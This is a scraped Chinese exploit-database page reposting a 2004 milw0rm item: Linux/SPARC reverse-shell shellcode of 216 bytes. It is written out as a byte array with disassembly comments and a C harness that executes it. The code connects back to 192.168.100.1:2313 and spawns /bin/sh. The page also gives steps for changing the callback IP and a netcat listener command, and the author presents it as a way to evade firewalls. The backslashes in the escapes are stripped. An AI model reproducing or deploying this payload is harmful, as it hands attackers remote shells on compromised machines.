Linux/SPARC – Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)
| 漏洞ID | 1054668 | 漏洞类型 | |
| 发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
![图片[1]-Linux/SPARC – Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Linux/SPARC – Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Linux_SPARC | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* linux (sparc) connect back shellcode, because someone had to evade those firewalls. *sigh* */
/*
* OS : Linux
* Architecture : Sparc
* Type : Connect Back
* Lenght : 216 Bytes
* Listen-Port : 2313/TCP
* Default IP : 192.168.100.1 ( see how you'll change it at the end. )
*
* null bytes (0x00), breaks (0x0a), nops, fork(), ... avoided.
* was tested accordingly, couldn't optimized more.
* plug it in your code, launch nc -l -vvv -p 2313 and wait for it.
*
* (c) 2002 killah @ hack . gr
* All rights reserved.
*
*/
#define NAME "Linux Sparc Connect-Back"
char cb_linux_sparc[]=
"x9dxe3xbfx80" // save %sp, -128, %sp
"x90x10x20x02" // mov 2, %o0
"xd0x37xbfxe0" // sth %o0, [ %fp + -32 ]
"x90x10x29x09" // mov 0x909, %o0
"xd0x37xbfxe2" // sth %o0, [ %fp + -30 ]
"x13x30x2ax19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"x90x12x60x01" // or %o1, 1, %o0 <- ALSO THIS.
"xd0x27xbfxe4" // st %o0, [ %fp + -28 ]
"x90x10x20x02" // mov 2, %o0
"x92x10x20x01" // mov 1, %o1
"x94x22x60x01" // sub %o1, 1, %o2
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x01" // mov 1, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x27xbfxf4" // st %o0, [ %fp + -12 ]
"x92x07xbfxe0" // add %fp, -32, %o1
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x94x10x20x10" // mov 0x10, %o2
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x03" // mov 3, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x92x1ax40x09" // xor %o1, %o1, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x92x10x20x01" // mov 1, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x92x10x20x02" // mov 2, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6
"xacx15xa1x6e" // or %l6, 0x16e, %l6
"x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7
"x90x0bx80x0e" // and %sp, %sp, %o0
"x92x03xa0x08" // add %sp, 8, %o1
"xa6x10x20x01" // mov 1, %l3
"x94x24xe0x01" // sub %l3, 1, %o2
"x9cx03xa0x10" // add %sp, 0x10, %sp
"xecx3bxbfxf0" // std %l6, [ %sp + -16 ]
"xd0x23xbfxf8" // st %o0, [ %sp + -8 ]
"xc0x23xbfxfc" // clr [ %sp + -4 ]
"x82x10x20x3b" // mov 0x3b, %g1
"x91xd0x20x10"; // ta 0x10
int
main()
{
int (*test)();
test = (int (*)()) cb_linux_sparc;
printf("%s shellcodentSize = %dn",NAME,strlen(cb_linux_sparc));
(int)(*test)();
exit(0);
}
/*******************************************************************************
here it is the C code, that will give you the IPv4 Address of your
box, in a big-endianess style, so to replace it inside shellcode and
get the whole thing working for you.
example:
int main() { printf(" 0x%02x%02x%02x%02xn",192,168,100,1); exit(0); }
or @ bash printf "0x%02x%02x%02x%02xn" 192 168 100 1
i believe no further explanation needed.
********************************************************************************/
//EOF
// milw0rm.com [2004-09-26]相关推荐: Sun Sendmail Forward File Privilege Escalation Vulnerability
Sun Sendmail Forward File Privilege Escalation Vulnerability 漏洞ID 1100777 漏洞类型 Unknown 发布时间 2003-03-06 更新时间 2003-03-06 CVE编号 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛8月前0
kankan啊啊啊啊3年前0
66666666666666